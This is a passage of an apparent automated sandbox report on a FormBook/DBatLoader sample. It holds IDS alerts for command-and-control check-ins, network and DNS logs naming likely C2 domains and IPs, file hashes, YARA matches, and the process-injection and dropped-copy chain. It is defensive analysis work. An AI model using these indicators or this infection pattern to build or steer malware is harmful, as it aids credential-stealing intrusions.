                                                      192.168.2.5217.160.0.9549719802031412 11/29/22-18:26:33.912103TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5217.160.0.95
                                                      192.168.2.552.85.92.8449717802031453 11/29/22-18:26:23.800962TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.552.85.92.84
                                                      192.168.2.5217.160.0.9549719802031449 11/29/22-18:26:33.912103TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5217.160.0.95
                                                      192.168.2.5192.0.78.14149715802031449 11/29/22-18:26:08.582417TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.5192.0.78.141
                                                      192.168.2.552.85.92.8449717802031412 11/29/22-18:26:23.800962TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.552.85.92.84
                                                      192.168.2.5192.0.78.14149715802031412 11/29/22-18:26:08.582417TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.5192.0.78.141
                                                      192.168.2.552.85.92.8449717802031449 11/29/22-18:26:23.800962TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.552.85.92.84

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 29, 2022 18:24:02.150501013 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.150546074 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.150648117 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.152163029 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.152179956 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.254343033 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.254555941 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.255497932 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.255589962 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.267853975 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.267887115 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.268393040 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.268481970 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.269418001 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.269438982 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.500678062 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.500714064 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.500811100 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.500822067 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.500838041 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.500870943 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.500896931 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.500904083 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.500924110 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.500952005 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.500967026 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.500974894 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.501029968 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526240110 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526367903 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526443005 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526479006 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526498079 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526504993 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526525021 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526536942 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526561975 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526582003 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526590109 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526628017 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526633024 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526657104 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526691914 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526717901 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526727915 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526765108 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526782990 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526839972 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.526849031 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.526925087 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554421902 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.554553032 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.554594040 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554619074 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.554632902 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554657936 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.554661036 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554682970 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.554713964 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554738998 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554744959 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.554785967 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554790974 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.554811954 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.554847002 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554872990 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554893017 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.554939032 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.554979086 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555042028 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.555049896 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555092096 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.555105925 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555126905 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555171967 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.555187941 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.555192947 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555222988 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555227995 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.555243969 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555279016 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.555296898 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.555304050 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555342913 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.555367947 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555430889 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.555437088 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.555522919 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.577827930 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.578022003 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.578116894 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.578166008 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.578205109 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.578243017 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.578641891 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.578684092 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.578753948 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.578780890 CET4434970813.107.43.12192.168.2.5
                                                      Nov 29, 2022 18:24:02.578811884 CET49708443192.168.2.513.107.43.12
                                                      Nov 29, 2022 18:24:02.578839064 CET49708443192.168.2.513.107.43.12

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 29, 2022 18:24:01.159205914 CET4972453192.168.2.58.8.8.8
                                                      Nov 29, 2022 18:24:02.097614050 CET6145253192.168.2.58.8.8.8
                                                      Nov 29, 2022 18:26:08.541414976 CET5922053192.168.2.58.8.8.8
                                                      Nov 29, 2022 18:26:08.563268900 CET53592208.8.8.8192.168.2.5
                                                      Nov 29, 2022 18:26:13.612112999 CET5506853192.168.2.58.8.8.8
                                                      Nov 29, 2022 18:26:13.632412910 CET53550688.8.8.8192.168.2.5
                                                      Nov 29, 2022 18:26:18.722286940 CET5668253192.168.2.58.8.8.8
                                                      Nov 29, 2022 18:26:18.742017984 CET53566828.8.8.8192.168.2.5
                                                      Nov 29, 2022 18:26:23.756469965 CET5853253192.168.2.58.8.8.8
                                                      Nov 29, 2022 18:26:23.777184010 CET53585328.8.8.8192.168.2.5
                                                      Nov 29, 2022 18:26:28.831734896 CET6265953192.168.2.58.8.8.8
                                                      Nov 29, 2022 18:26:28.853539944 CET53626598.8.8.8192.168.2.5
                                                      Nov 29, 2022 18:26:33.864237070 CET5626353192.168.2.58.8.8.8
                                                      Nov 29, 2022 18:26:33.889528990 CET53562638.8.8.8192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Nov 29, 2022 18:24:01.159205914 CET192.168.2.58.8.8.80x3277Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:24:02.097614050 CET192.168.2.58.8.8.80xb4c2Standard query (0)ppqfqw.ph.files.1drv.comA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:08.541414976 CET192.168.2.58.8.8.80xcc02Standard query (0)www.librairie-adrienne.comA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:13.612112999 CET192.168.2.58.8.8.80x953aStandard query (0)www.rematedeldia.comA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:18.722286940 CET192.168.2.58.8.8.80xb26aStandard query (0)www.thecuratedpour.comA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:23.756469965 CET192.168.2.58.8.8.80x5846Standard query (0)www.customapronsnow.comA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:28.831734896 CET192.168.2.58.8.8.80xae1Standard query (0)www.segurofunerarioar.comA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:33.864237070 CET192.168.2.58.8.8.80x5457Standard query (0)www.kuechenpruefer.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Nov 29, 2022 18:24:01.202867985 CET8.8.8.8192.168.2.50x3277No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                      Nov 29, 2022 18:24:02.146754980 CET8.8.8.8192.168.2.50xb4c2No error (0)ppqfqw.ph.files.1drv.comph-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 29, 2022 18:24:02.146754980 CET8.8.8.8192.168.2.50xb4c2No error (0)ph-files.fe.1drv.comodc-ph-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                      Nov 29, 2022 18:24:02.146754980 CET8.8.8.8192.168.2.50xb4c2No error (0)l-0003.l-dc-msedge.net13.107.43.12A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:08.563268900 CET8.8.8.8192.168.2.50xcc02No error (0)www.librairie-adrienne.comlibrairie-adrienne.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 29, 2022 18:26:08.563268900 CET8.8.8.8192.168.2.50xcc02No error (0)librairie-adrienne.com192.0.78.141A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:08.563268900 CET8.8.8.8192.168.2.50xcc02No error (0)librairie-adrienne.com192.0.78.240A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:13.632412910 CET8.8.8.8192.168.2.50x953aNo error (0)www.rematedeldia.comcompralo1234.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 29, 2022 18:26:13.632412910 CET8.8.8.8192.168.2.50x953aNo error (0)compralo1234.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 29, 2022 18:26:13.632412910 CET8.8.8.8192.168.2.50x953aNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:18.742017984 CET8.8.8.8192.168.2.50xb26aName error (3)www.thecuratedpour.comnonenoneA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:23.777184010 CET8.8.8.8192.168.2.50x5846No error (0)www.customapronsnow.com52.85.92.84A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:23.777184010 CET8.8.8.8192.168.2.50x5846No error (0)www.customapronsnow.com52.85.92.99A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:23.777184010 CET8.8.8.8192.168.2.50x5846No error (0)www.customapronsnow.com52.85.92.94A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:23.777184010 CET8.8.8.8192.168.2.50x5846No error (0)www.customapronsnow.com52.85.92.122A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:28.853539944 CET8.8.8.8192.168.2.50xae1Name error (3)www.segurofunerarioar.comnonenoneA (IP address)IN (0x0001)false
                                                      Nov 29, 2022 18:26:33.889528990 CET8.8.8.8192.168.2.50x5457No error (0)www.kuechenpruefer.com217.160.0.95A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • ppqfqw.ph.files.1drv.com

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:18:23:55
                                                      Start date:29/11/2022
                                                      Path:C:\Users\user\Desktop\0321423605241625.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\0321423605241625.exe
                                                      Imagebase:0x400000
                                                      File size:750592 bytes
                                                      MD5 hash:EDB1382C354EC6C09C53473E5335703A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Borland Delphi
                                                      Yara matches:
                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.308860487.0000000003BAE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.308375056.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Target ID:1
                                                      Start time:18:24:02
                                                      Start date:29/11/2022
                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\colorcpl.exe
                                                      Imagebase:0x1140000
                                                      File size:86528 bytes
                                                      MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Target ID:2
                                                      Start time:18:24:05
                                                      Start date:29/11/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff69bc80000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      General

                                                      Target ID:3
                                                      Start time:18:24:14
                                                      Start date:29/11/2022
                                                      Path:C:\Users\Public\Libraries\Mwqrxeuz.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\Libraries\Mwqrxeuz.exe"
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:750592 bytes
                                                      MD5 hash:EDB1382C354EC6C09C53473E5335703A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:Borland Delphi
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 36%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Target ID:4
                                                      Start time:18:24:18
                                                      Start date:29/11/2022
                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\colorcpl.exe
                                                      Imagebase:0x1140000
                                                      File size:86528 bytes
                                                      MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Target ID:9
                                                      Start time:18:25:26
                                                      Start date:29/11/2022
                                                      Path:C:\Windows\SysWOW64\raserver.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\raserver.exe
                                                      Imagebase:0x870000
                                                      File size:108544 bytes
                                                      MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Target ID:10
                                                      Start time:18:25:37
